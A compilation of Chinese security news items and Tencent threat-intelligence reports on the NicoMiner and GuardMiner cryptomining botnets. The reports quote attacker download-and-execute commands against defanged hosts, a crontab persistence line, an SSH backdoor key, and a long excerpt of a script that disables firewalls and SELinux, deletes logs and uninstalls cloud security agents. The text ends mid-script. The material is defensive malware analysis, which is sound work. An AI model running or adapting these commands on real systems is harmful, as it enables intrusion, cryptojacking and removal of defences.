Kek Security （Keksec）是一个极为活跃的黑客组织，Checkpoint和Netlab360的报告都对其进行了详细分析。Keksec利用多个漏洞，使用多态工具(包括Linux和Windows有效负载)自定义python恶意软件以攻击多个架构。目前该黑客组织正在积极构建IRC僵尸网络，用于DDoS攻击和勒索活动。本文详细介绍了Keksec利用的工具和使用的策略，以及相关黑客的信息。 … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1520/     消息来源：Lacework， 译者：小江； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc ” 并附上原文链接

近日，NHS Horizons官员的推特帐户被黑客入侵后被用来宣传PS5。据BBC报道称，NHS Horizons高官Helen Bevan发现她的两个推特帐户遭到了黑客的攻击，黑客在黑入后把头像改成了PS5的标识。 由于Bevan没有开启双重身份验证，帐号在经历了几天后才被找回。找回后Bevan发现在私信中有不少人向她询问关于PS5的具体情况。 在随后的推文中，Bevan表示，她希望其他人引以为戒，在推特账户上开启双重身份验证来避免类似的情况。           （消息及封面来源：cnBeta）

摘要 NicoMiner利用三个漏洞入侵传播： Hadoop Yarn未授权访问漏洞 PostgreSQL未授权漏洞 PostgreSQL提权代码执行漏洞（CVE-2019-9193）； 利用漏洞入侵成功后会针对Windows、Linux系统分别投放门罗币矿机； 感染量增长较快，一个月内翻倍，受害服务器约3000台； 针对Windows、Linux两个平台的挖矿木马使用相同的钱包； 关联分析发现疑似作者ID：Nico Jiang； 通过腾讯安图查询历史情报，发现作者疑似从事刷量相关的黑产记录。   一、概述 腾讯安全威胁情报中心捕获一起快速增长的挖矿木马NicoMiner，该木马通过Hadoop Yarn未授权访问漏洞、PostgreSQL未授权及提权代码执行漏洞（CVE-2019-9193）进行入侵攻击，会根据操作系统不同分别植入Windows和Linux平台的门罗币挖矿木马。 由于攻击者使用的域名和样本PDB信息中包含“nico jiang”的ID信息，腾讯安全威胁情报中心将该挖矿木马命名为NicoMiner。根据该挖矿木马使用的钱包算力推算，该木马在近一个月内感染量已翻倍，估计受害服务器已达3000台左右。 进一步溯源分析还发现，“nico jiang”在较早时候已从事黑灰产业，该ID陆续注册了与游戏推广、刷量黑灰产有关的域名，近期启用之前留置的相关网络资源从事挖矿黑产。也不排除近期可能有其他黑客掌控 “nico jiang”曾经注册的相关域名和开发设备，用来制作、传播NicoMiner挖矿木马。 腾讯安全全系列产品已支持对NicoMiner挖矿木马攻击传播的各个环节进行检测防御： 排查和加固 由于NicoMiner挖矿木马的攻击呈现明显增长趋势，腾讯安全专家建议企业客户参考以下步骤对系统进行排查和加固： 1.删除进程和文件： 文件： /*/pgsql-*/data/java.* /*/pgsql/data/java.* /*/postgres/*/data/LinuxTF /tmp/java Windows系统 c:\postgresql\*\data\conhost.exe c:\postgresql\*\data\sqltools.exe c:\windows\temp\st.exe c:\program files\postgresql\data\pg*\sqltools.exe 检查CPU占用高的进程： java LinuxTF conhost.exe sqltools.exe 2.加固系统： Hadoop 1)如果Hadoop环境仅对内网提供服务，请不要将其服务开放到外网可访问。 2)如果必须开启公网访问，Hadoop在2.X以上版本提供了安全认证功能，建议管理员升级并启用Kerberos的认证功能，阻止未经授权的访问。 PostgreSQL 1)修改PostgreSQL的访问配置/data/pgsql/9.3/data/pg_hba.conf，限制不受信任的对象进行访问； 2)谨慎考虑分配pg_read_server_files、pg_write_server_files、pg_execute_server_program 角色权限给数据库客户。 二、样本分析 漏洞入侵 1）Hadoop Yarn未授权访问漏洞 Hadoop是一个由Apache基金会所开发的分布式系统基础架构，YARN是hadoop系统上的资源统一管理平台，其主要作用是实现集群资源的统一管理和调度，可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上，通过YARN来管理资源。客户可以向YARN提交特定应用程序进行执行，其中就允许执行相关包含系统命令。 YARN提供有默认开放在8088和8090的REST API（默认前者）允许客户直接通过API进行相关的应用创建、任务提交执行等操作，如果配置不当，REST API将会开放在公网导致未授权访问的问题，攻击者可以在未授权的情况下远程执行代码。 攻击者通过扫描暴露在公网的的8088端口，发现没有开启特定客户安全认证的集群，并通过YARN RESET API提交应用，提交任务的客户名为dr.who。 攻击者在创建的Hadoop应用中通过Post hxxp://ip:8088/ws/v1/cluster/apps执行恶意命令为： wget hxxp://raw.nicosoft.org/java && chmod x java && ./java || curl -O hxxp://raw.nicosoft.org/java && chmod x java && ./java 该命令从黑客控制的服务器上下载挖矿木马java并启动。 2）PostgreSQL未授权访问漏洞 PostgreSQL未授权访问漏洞主要是由于管理员配置不当形成的。PostgreSQL配置文件在/data/pgsql/9.3/data/pg_hba.conf，如果管理员没有正确的配置信任的主机，（如下图），则会导致任意客户无需密码均可访问PostgreSQL数据库。 3）PostgreSQL提权代码执行漏洞（CVE-2019-9193） 2019年3月安全研究人员披露了PostgreSQL提权代码执行漏洞（CVE-2019-9193）的漏洞细节，具有数据库服务端文件读权限的攻击者利用此漏洞，可执行任意系统命令。 此次披露的漏洞存在于导入导出数据的命令“COPY TO/FROM PROGRAM””中，“pg_read_server_files”组内客户执行上述命令后，可获取数据库超级客户权限，从而执行任意系统命令。该漏洞几乎影响了PostgreSQL的所有版本（从9.3到最新版本），同时也影响了所有的操作系统：Windows，Linux和Mac。 受影响PostgreSQL版本：PostgreSQL >=9.3 攻击者通过批量扫描5432端口发现PostgreSQL服务器，然后利用未授权访问漏洞获得了PostgreSQL数据库的访问权限，接着再利用PostgreSQL提权代码执行漏洞（CVE-2019-9193）根据不同的系统执行以下恶意命令： 针对Linux系统： sh -c curl -O hxxp://raw.nicosoft.org/java && chmod +x java && ./java 针对Windows系统： certutil -urlcache -split -f hxxp://raw.nicosoft.org/conhost.exe conhost.exe&start conhost.exe 挖矿 入侵Linux系统下载的挖矿木马java： 入侵Windows系统后下载的dowanload木马conhost.exe，负责继续下载和启动挖矿木马SqlTools.exe 挖矿木马SqlTools.exe   挖矿使用矿池：xmr.f2pool.com 两种系统下的挖矿木马使用同一个钱包： 42Pv7VF4etz1dDPkjRWDEec2FVoFzSPDYKCsjNXDdusaTShBZZn6nr8GyNsqu8ekjSU17jmu7h6SfLg1Lr3rrJnHVokCbso 钱包收益：7个XMR 过去一个月钱包算力翻番，从150kH/s左右涨到了300kH/s，这也意味着感染的机器翻了一倍，估算在3000台左右。   三、关联分析 分析样本发现，dowanload木马conhost.exe中保留了文件的PDB信息，其中“Nico Jiang”疑似木马作者的ID号。 C:\Users\Nico Jiang\source\repos\NicoSoft\x64\Release\conhost.pdb 通过腾讯安图高级威胁溯源系统查询木马下载使用的域名“raw.nicosoft.org”，同样发现了注册者的名字为“Nico Jiang”，推测该ID号是攻击者的可能性较高。 通过搜索引擎搜索，发现域名注册的QQ邮箱对应QQ号所有者，在某个论坛接一些批量登录工具的开发需求。 该ID注册的另一个域名ns-game.top 通过该域名注册使用的outlook邮箱,查询到在github提交的项目，属于相关平台的辅助管理插件： 结论 从对ID “nico jiang”搜索到的信息来看，可以判断该ID对应的人员是一位软件开发人员，曾经从事一些网站、游戏或知名应用的批量登陆工具，刷量工具的开发，具有一定的灰产属性，而相关记录大都在2016年。 可疑的地方是，注册人显示为”nico jiang”的域名raw.nicosoft.org、ns-game.top的注册时间分别在2017年和2018年，而PDB信息包含”nico jiang”的木马样本conhost.exe编译日期是2021年3月21日（更早的样本也只再2021年2月开始出现），两者相隔较远。 推测可能有两种结论，第一种是”nico jiang”在从事灰产的时候注册了相关域名，并在发现了挖矿具有很大的获利空间之后，转向了制作挖矿木马的黑产，并且使用了之前注册的相关域名来提供下载服务。 第二种是有其他黑产获得了”nico jiang”的域名，以及”nico jiang”所使用过的电脑（PDB路径中的客户名通常是开发机器的客户名）的控制权，并且利用这些资源来开发和传播挖矿木马。根据已有的线索来看，属于第一种情况的可能性较大，腾讯安全威胁情报中心会将相关线索提交给有关部门，以对不法分子进行身份确认和追踪。   三、威胁视角看攻击行为 ATT&CK阶段 行为 侦察 扫描IP端口，确认可攻击目标存在的Web服务：Hadoop Yarn, PostgreSQL等。 资源开发 注册C2服务器，制作downlaoder木马，挖矿木马 初始访问 利用对外开放的Hadoop Yarn, PostgreSQL服务漏洞，植入恶意Payload执行恶意命令进而入侵系统 执行 首先植入恶意脚本执行恶意命令，随后下载挖矿木马 防御规避 木马文件加壳保护，将文件命名伪装为系统文件 影响 门罗币矿机不间断的工作，会导致系统CPU负载过大，大量消耗主机CPU资源，严重影响主机正常服务运行，导致主机有系统崩溃风险。 订阅腾讯安全威胁情报产品，赋能全网安全设备 该团伙相关的威胁数据已加入腾讯安全威胁情报，可赋能给腾讯全系列安全产品，推荐政企客户通过订阅腾讯安全威胁情报产品，让全网安全设备同步具备相应的威胁检测、防御能力。 公有云的安全防护 推荐政企客户在公有云中部署腾讯云防火墙、腾讯主机安全（云镜）等产品检测防御相关威胁。 腾讯云防火墙（云镜）已支持拦截利用PostgreSQL提权代码执行漏洞（CVE-2019-9193）发起的恶意攻击行为。 腾讯主机安全可对病毒攻击过程中产生得木马落地文件进行自动检测，客户可后台一键隔离，删除。 私有云的安全防护 私有云客户可通过腾讯T-Sec高级威胁检测系统进行流量检测分析，及时发现黑客团伙的攻击活动。腾讯T-Sec高级威胁检测系统（御界）可检测到利用PostgreSQL提权代码执行漏洞（CVE-2019-9193）发起的恶意攻击行为。 NicoMiner挖矿木马会危害Linux、Windows双平台系统，推荐企业私有云客户在每台终端、服务器部署腾讯T-Sec零信任无边界访问控制系统（iOA），腾讯iOA集成病毒防护和漏洞修复能力可防御病毒木马对终端和服务器的破坏活动。腾讯iOA通过验证客户身份、设备及应用安全状态确定是否允许客户访问企业业务，确保对企业公有云、私有云以及本地业务的可信访问。无论员工位于何处、使用何设备，都可安全访问企业资源和数据。 腾讯安全响应清单 腾讯安全系列产品针对NicoMiner挖矿木马攻击的具体响应清单如下： 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）威胁情报已加入，可赋能全网安全设备。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考: https://cloud.tencent.com/product/tics 腾讯T-Sec 网络空间风险云监测系统 （CCMS） 1）NicoMiner相关情报已加入。 腾讯安全云监测系统，面向行业客户的监管方和被监管方，结合漏洞扫描、涉敏内容检测、全网威胁情报发现能力等，为客户提供全面、及时的互联网风险监测评估服务，并可提供配套安全管家服务，可对相关风险提供有效的响应处理。 腾讯T-Sec 高级威胁追溯系统 1）NicoMiner相关情报已支持检索，可自动关联分析到该病毒家族最新变种，使用资产。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。腾讯T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud  Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，阻断恶意攻击流量，阻断恶意通信流量： 1）NicoMiner相关联的IOCs已支持识别检测； 2）已支持检测以下漏洞利用攻击： Hadoop未授权访问漏洞、Postgres提权代码执行漏洞CVE-2019-9193 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）云镜已支持NicoMiner关联模块的检测告警，查杀清理。 2）已支持检测主机存在的以下相关漏洞： Hadoop未授权访问漏洞、Postgres未授权访问漏洞 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 （SOC） 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）NicoMiner相关联的IOCs已支持识别检测； 2）已支持检测以下漏洞利用攻击： Hadoop未授权访问漏洞、Postgres提权代码执行漏洞CVE-2019-9193 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec 零信任无边界 访问控制系统 （iOA） 1）已支持NicoMiner关联模块的检测告警，查杀清理。 零信任无边界访问控制系统（iOA）是腾讯结合自身丰富的网络安全管理实践经验与“零信任”理念，推出的网络边界访问管控整体解决方案。更多资料，可参考：https://s.tencent.com/product/ioa/index.html   IOCs Domain raw.nicosoft.org IP 154.91.1.27（ZoomEye搜索结果） Md5 Java df840b3decb91ae7480b2ccf95df9f9a Java dba1ef891aed1c769014a0d3aa5ed321 Java 1aa6a96f4a6fcc5c4309f2406d3479ba CONHOST.EXE 32b8a44ee3214ab56e1edbaa016918c7 CONHOST.EXE 0a31ae5882697455a071f73191ed661c CONHOST.EXE 2c31a7243f00afe467e2994d3c249024 conhost.exe bf825890526386dd96e82d2ce57e0303 SqlTools.exe 84757d6b1a94021f246d14b37c1015b8 task.exe 52cd60289ffe8e14c5aa6cb8ea8ad730 LinuxTF f453b9c09ea2fb6a194b5d81d515b0e8 URL hxxp://raw.nicosoft.org/SqlTools.exe hxxp://nicosoft.org/SqlTools.exe hxxp://154.91.1.27/SqlTools.exe hxxp://nicosoft.org/sqltools.exe hxxp://154.91.1.27/sqltools.exe hxxp://raw.nicosoft.org/java hxxp://raw.nicosoft.org/conhost.exe hxxp://154.91.1.27/task.exe hxxp://154.91.1.27/conhost.exe hxxp://154.91.1.27/WinRing0x64.sys hxxp://154.91.1.27/LinuxTF   参考链接： https://s.tencent.com/research/report/1206.html https://s.tencent.com/research/report/1175.html https://cloud.tencent.com/developer/article/1472565  

网络检测和响应公司Vectra AI的最新研究显示，由于COVID-19，88%的公司已经加快了云和数字化转型项目。但它还发现，71%的Office 365用户遭遇恶意账户接管。 令人担忧的是，只有三分之一的安全专业人员认为他们可以立即识别和阻止账户接管攻击，大多数人预计需要几天甚至几周的时间来拦截这种违规行为。Vectra公司CTO团队技术总监Tim Wade说：”我们经常看到基于身份的攻击被用来绕过传统外围防御，如多因素认证（MFA）。帐户接管正在取代网络钓鱼成为最常见的攻击载体，而MFA防御系统现在已经变成减速带，而无法阻止攻击。组织需要认真对待这一点，并计划在业务发生实质性中断之前检测和控制账户泄露。恶意访问，即使是短时间的，也会造成巨大的损失。” 安全团队对自己公司安全措施有效性有很高的信心。近五分之四的人声称对绕过防火墙等外围防御的攻击有良好或非常好的可视性。然而，管理层受访者和SOC分析师等从业人员之间的意见存在有趣的对比，管理人员对自己的防御能力表现出更大的信心。总的来说，微软Office365客户提到的最主要的安全问题是云端保存的数据被泄露的风险、账户被接管的风险以及黑客隐藏行踪的能力。 经理们明显比那些在工作场所进行具体工作的人更有信心，这里有一定程度的自欺欺人，也许是因为与高级管理层分享的指标往往更多关注的是被阻止的攻击量，而不是攻击的严重性或达成确定结论的调查数量。不管是什么原因，重要的是不要自满，要对新类型的攻击保持持续的警惕。           （消息及封面来源：cnBeta）

据外媒报道，去年夏天，美坦帕市青少年 Graham Ivan Clark控制了数个知名Twitter账号并利用它们索要了价值10万多美元的比特币。当地时间周二，他承认了这些指控并被判三年监禁。Clark在跟检察官达成的一项协议中同意服刑3年，之后则还有3年缓刑。 Clark在17岁的时候被指控策划了一场社交媒体网络攻击，一些全球最耳熟能详的名字–包括美总统拜登、前美国总统奥巴马、埃隆·马斯克、坎耶·维斯特、比尔·盖茨、沃伦·巴菲特、迈克·布隆伯格、杰夫·贝佐斯、弗洛伊德·梅威瑟、金·卡戴珊等名人及苹果、Uber等公司。 该协议允许现年18岁的Clark被判为“青少年罪犯”，这使他避免了至少长达10年的刑期。不过如果Clark违反了缓刑处罚那么他将被强制执行最低刑期。 据悉，他将在一所专为年轻人设立的州立监狱服刑。另外，他可能有资格在一个军事化的新兵训练营中服役一段时间。 希尔斯堡州检察官Andrew Warren在一份声明中说道：“Graham Clark需要对这一罪行负责，其他潜在的诈骗者需要看到后果。在这种情况下，我们能承担这些后果，同时也认识到，我们对任何孩子的目标是，只要有可能则是让他们吸取教训，而非毁掉他们的未来。” 当地时间周二下午，Clark出现在希尔斯伯勒县监狱的虚拟法庭听证会上。自被捕以来，他一直被关押在那里。他身穿红色制服，戴着医用口罩，留着平头。 Clark在回答法官Christine Marlewski提出的一系列标准问题时其声音表现得非常单调。他在法庭上认罪并放弃接受审判的权利。除此之外，他几乎没说别的。 辩诉协议的条款要求，在没有得到执法部门许可和监督的情况下，禁止Clark使用电脑。他将不得不接受有关部门对他财产的搜查并交出其控制的所有账号的密码。 Clark的辩护律师David Weisbrod则证实，当事人交出了其获得的所有加密货币。             （消息及封面来源：cnBeta）

Apple Insider 报道称，在拜登政府概述了加强政府网络安全的计划之后，微软也决定在内部开展调查，以明确日益严重的 Exchange 服务器攻击是否源于潜在的漏洞。《华尔街日报》 周一报道指出，这家科技巨头发起了一项专门的调查，以检查“敏感信息”是否经由该公司的某些安全合作伙伴渠道而泄露。 具体说来是，微软正调查是否有人有意或无意地泄露了该公司私下发送给 MAPP 项目成员的概念验证代码。 据悉，MAPP 全称为 Microsoft Active Protections Program，目前已有大约 80 个组织成员。 3 月初的时候，微软发布了针对 Exchange 邮件服务器、正在被积极利用的四个零日漏洞的紧急补丁。 早在今年 1 月，微软就已经发现了这方面的问题。且在补丁发布前的 2 月 23 日，至少与少数几位 MAPP 合作伙伴探讨过概念验证用途的攻击代码。 结果表明，Exchange 攻击中使用的某些工具，与其私有代码具有一定程度的相似性。相关攻击波及全美至少 3 万个机构，其中包括了许多知名企业。 3 月 11 日，一名安全研究人员简要发布了微软的 GitHub 概念验证代码。但在首波攻击发起之后，相关漏洞也很快被其它网络犯罪组织所利用。 尽管该代码很快被移除，但仅一天之后，安全研究人员和联邦机构就开始发出警告，称相关漏洞已被用于在受感染机器上部署勒索软件。   【背景资料】 在 Exchange 邮件服务器漏洞攻击事件爆发之前，微软也曾于 2020 年遭到 SolarWinds 黑客入侵事件的影响。 3 月 12 日，白宫方面分享了新闻界人士和某位政府高级官员之间的谈话内容简报，概述了美国应积极制定相应计划，以应对日益严峻的网络安全事件。 这位高级官员称，拜登政府希望企业在软件构建和采购等方面优先考虑安全性。同时在网络安全的响应上，也应将重点放在与私营企业的更机密合作上。         （消息来源：cnBeta；封面源自网络）

由于更多的黑客组织涌入，试图在受影响的公司为其服务器打补丁之前趁虚而入，微软Exchange服务器被黑客攻击正成为一个更大的安全问题。微软3月3日披露，黑客组织 “Hafnium”的攻击目标是微软Exchange服务器的漏洞，促使微软发布补丁。 漏洞公布后不久，Hafnium加强了攻击力度，在几天内袭击了3万家美国机构和世界各地的其他机构，但现在其他机构也加入了战团。安全专家告诉《金融时报》，更多的黑客组织正在利用这个机会，利用同样的漏洞进行自己的攻击。包括犯罪集团在内的黑客们，都是在托管服务器的组织打上补丁和保护之前，利用软件漏洞介入的。 对许多人来说，现在先发制人地修补这个问题可能为时已晚。”每一个可能的受害者，如果在上周中到年底还没有打补丁，就已经被至少一个或几个行为者命中了，”安全组织CrowdStrike联合创始人Dmitri Alperovitch这样表示。 在美国之外，欧洲银行业管理局成为第一个确认受到攻击的主要公共机构。 膨胀的攻击规模将在一段时间内成为一个严重的问题，促使政府进行干预。网络安全和基础设施安全局（CISA）已经敦促 “所有部门的所有组织遵循指导，以解决国内和国际上广泛存在的漏洞”。 还有人建议使用微软的IOC检测工具来确定是否发生了脆弱系统的入侵。同时白宫国家安全委员会声称：”任何拥有脆弱服务器的组织都必须立即采取措施，确定是否已经成为目标。”           （消息来源：cnBeta；封面源自网络）

一、概述 腾讯安全威胁情报中心检测到GuardMiner挖矿木马团伙新的攻击活动，该团伙利用Elasticsearch远程代码执行漏洞（CVE-2015-1427）等9种漏洞武器针对云上主机发起攻击。根据检测数据推算，受害主机已过万台，该挖矿木马会卸载云主机安装的安全软件。腾讯安全专家建议企业安全运维人员积极修复服务器组件漏洞，避免使用弱口令，防止云主机被该团伙使用的漏洞武器攻陷。 GuardMiner最早出现于2019年，至今已活跃超过2年，该挖矿木马通过Go语言编写的二进制程序针对Windows平台和Linux平台进行攻击传播，通过crontab定时任务以及安装SSH公钥后门进行持久化控制，并且还会利用比特币的交易记录来动态更新C2地址。 分析发现，GuardMiner挖矿团伙最新的攻击活动利用了多达9种攻击传播手法： 1)    CCTV设备RCE漏洞； 2)    Redis未授权访问漏洞； 3)    Drupal框架CVE-2018-7600漏洞； 4)    Hadoop未授权访问漏洞； 5)    Spring RCE漏洞CVE-2018-1273； 6)    Thinkphp V5高危漏洞； 7)    WebLogic RCE漏洞CVE-2017-10271； 8)    SQL Server弱口令爆破； 9)    Elasticsearch RCE漏洞 CVE-2015-1427、CVE-2014-3120 GuardMiner挖矿团伙入侵云主机后的挖矿行为会对服务器性能产生严重负面影响，服务器的正常业务有中断或崩溃风险。挖矿团伙在失陷服务器留置后门，关闭linux防火墙、卸载云服务器安全软件等行为，会导致服务器安全性受损，增加被其他黑客组织攻击的风险。 排查和加固 由于GuardMiner掌握较强的自动化攻击和扩散感染能力，腾讯安全专家建议企业及时检查以下位置并进行清理，同时对服务器使用的相关组件进行版本检查和漏洞修复，对于Redis、SQL Server使用的弱密码尽快予以纠正。 文件和进程 /etc/phpguard /etc/phpupdate /etc/networkmanager Crontab任务： */30 * * * * sh /etc/newdat.sh */2 * * * * curl -fsSL hxxp://h.epelcdn.com/dd210131/pm.sh SSH公钥（/root/.ssh/authorized_keys）： AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17 腾讯安全响应清单 腾讯安全全系列产品支持对GuardMiner挖矿木马攻击传播的各个环节进行检测拦截。 腾讯安全产品针对GuardMiner团伙漏洞攻击武器，可在各个环节进行检测防御，具体响应清单如下： 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）威胁情报已加入，可赋能全网安全设备。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 网络空间风险云监测系统 （CCMS） 1）GuardMiner相关情报已加入。 腾讯安全云监测系统，面向行业用户的监管方和被监管方，结合漏洞扫描、涉敏内容检测、全网威胁情报发现能力等，为用户提供全面、及时的互联网风险监测评估服务，并可提供配套安全管家服务，可对相关风险提供有效的响应处理。 腾讯T-Sec 高级威胁追溯系统 1）GuardMiner相关情报已支持检索，可自动关联分析到该病毒家族最新变种，使用资产。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud  Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，阻断恶意攻击流量，阻断恶意通信流量： 1）GuardMiner相关联的IOCs已支持识别检测； 2）已支持检测以下漏洞利用攻击： Hadoop未授权访问漏洞 Drupal CVE-2018-7600漏洞 thinkphp TP5高危漏洞 WebLogic CVE-2017-10271漏洞 Elasticsearch CVE-2014-3120远程代码执行漏洞 有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）云镜已支持GuardMiner关联模块的检测告警，查杀清理。 2）已支持检测主机存在的以下相关漏洞： Redis未授权命令执行漏洞 Hadoop未授权访问漏洞 Drupal  CVE-2018-7600漏洞 thinkphp  TP5高危漏洞 WebLogic  CVE-2017-10271漏洞 Elasticsearch  CVE-2014-3120远程代码执行漏洞 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）GuardMinerr相关联的IOCs已支持识别检测； 2）已支持检测以下漏洞利用攻击： Redis未授权命令执行漏洞 Hadoop未授权访问漏洞 Drupal  CVE-2018-7600漏洞 Spring  CVE-2018-1273漏洞 thinkphp  TP5高危漏洞 WebLogic  CVE-2017-10271漏洞 Elasticsearch CVE-2014-3120远程代码执行漏洞Elasticsearch  CVE-2015-1427远程代码执行漏洞 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec 零信任无边界 访问控制系统 （iOA） 1）已支持GuardMiner关联模块的检测告警，查杀清理。 零信任无边界访问控制系统（iOA）是腾讯结合自身丰富的网络安全管理实践经验与“零信任”理念，推出的网络边界访问管控整体解决方案。更多资料，可参考：https://s.tencent.com/product/ioa/index.html 二、样本分析 利用Elasticsearch漏洞入侵 Elasticsearch是用Java语言开发的，并作为Apache许可条款下的开放源码发布，是一种流行的企业级搜索引擎。Elasticsearch用于云计算中，能够达到实时搜索，稳定，可靠，快速，安装使用方便。 搜索引擎支持使用脚本代码（Groovy）作为表达式进行数据操作，并且加入了沙盒进机制对危险的代码进行拦截，由于沙盒限制的不严格，导致产生远程代码执行漏洞CVE-2015-1427。该漏洞的攻击代码已被公开：hxxps://github.com/t0kx/exploit-CVE-2015-1427/blob/master/exploit.sh 腾讯云防火墙检测到黑客利用CVE-2015-1427漏洞攻击云主机： 利用漏洞执行的恶意命令为： wget hxxp://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh -P /tmp/sssooo 我们对命令下载执行的脚本init.sh进行分析发现其属于挖矿僵尸网络GuardMiner。 环境准备 1. init.sh关闭selinux防火墙 setenforce 0 2>dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null 2. 清理缓存 sync && echo 3 >/proc/sys/vm/drop_caches 3. 获取crontab目录和SSH公钥认证文件 crondir='/var/spool/cron/'"$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` 4. 将下载程序curl、wget重命名为cdt、wdt bbdir="/usr/bin/curl" bbdira="/usr/bin/cdt" ccdir="/usr/bin/wget" ccdira="/usr/bin/wdt" mv /usr/bin/curl /usr/bin/url mv /usr/bin/url /usr/bin/cdt mv /usr/bin/cur /usr/bin/cdt mv /usr/bin/cdl /usr/bin/cdt mv /usr/bin/cd1 /usr/bin/cdt mv /usr/bin/wget /usr/bin/get mv /usr/bin/get /usr/bin/wdt mv /usr/bin/wge /usr/bin/wdt mv /usr/bin/wdl /usr/bin/wdt mv /usr/bin/wd1 /usr/bin/wdt 5. 设置Linux系统能打开的最大文件数量 ulimit -n 65535 6. 删除系统日志文件 rm -rf /var/log/syslog 7. 设置tmp目录无法被删除 chattr -iua /tmp/ chattr -iua /var/tmp/ 8. 关闭Linux防火墙，删除过滤规则 ufw disable iptables -F 9. 禁用看门狗程序 echo '0' >/proc/sys/kernel/nmi_watchdog echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf 10. 卸载阿里云骑士等云主机安全软件 if ps aux | grep -i '[a]liyun'; then $bbdir http://update.aegis.aliyun.com/download/uninstall.sh | bash $bbdir http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash $bbdira http://update.aegis.aliyun.com/download/uninstall.sh | bash $bbdira http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash pkill aliyun-service rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service rm -rf /usr/local/aegis* systemctl stop aliyun.service systemctl disable aliyun.service service bcm-agent stop yum remove bcm-agent -y apt-get remove bcm-agent -y elif ps aux | grep -i '[y]unjing'; then /usr/local/qcloud/stargate/admin/uninstall.sh /usr/local/qcloud/YunJing/uninst.sh /usr/local/qcloud/monitor/barad/admin/uninstall.sh Fi service apparmor stop systemctl disable apparmor service aliyun.service stop systemctl disable aliyun.service ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 % rm -rf /usr/local/aegis 11. 设置系统最大内存分页 echo 128 > /proc/sys/vm/nr_hugepages sysctl -w vm.nr_hugepages=128 12. 设置挖矿木马、Shell脚本、扫描程序、守护程序的下载URL miner_url="hxxp://176.123.7.127/id210131/phpupdate" miner_url_backup="hxxp://h.epelcdn.com/dd210131/phpupdate" sh_url="hxxp://176.123.7.127/id210131/newdat.sh" sh_url_backup="hxxp://h.epelcdn.com/dd210131/newdat.sh" config_url="hxxp://176.123.7.127/id210131/config.json" config_url_backup="hxxp://h.epelcdn.com/dd210131/config.json" scan_url="hxxp://176.123.7.127/id210131/networkmanager" scan_url_backup="hxxp://h.epelcdn.com/dd210131/networkmanager" watchdog_url="hxxp://176.123.7.127/id210131/phpguard" watchdog_url_backup="hxxp://h.epelcdn.com/dd210131/phpguard" 13. 从比特币的交易记录中动态获取C2地址 （使用的比特币钱包为：1Hf2CKoVDyPj7dNn3vgTeFMgDqVvbVNZQq） if [ -x "$(command -v curl)" ]; then 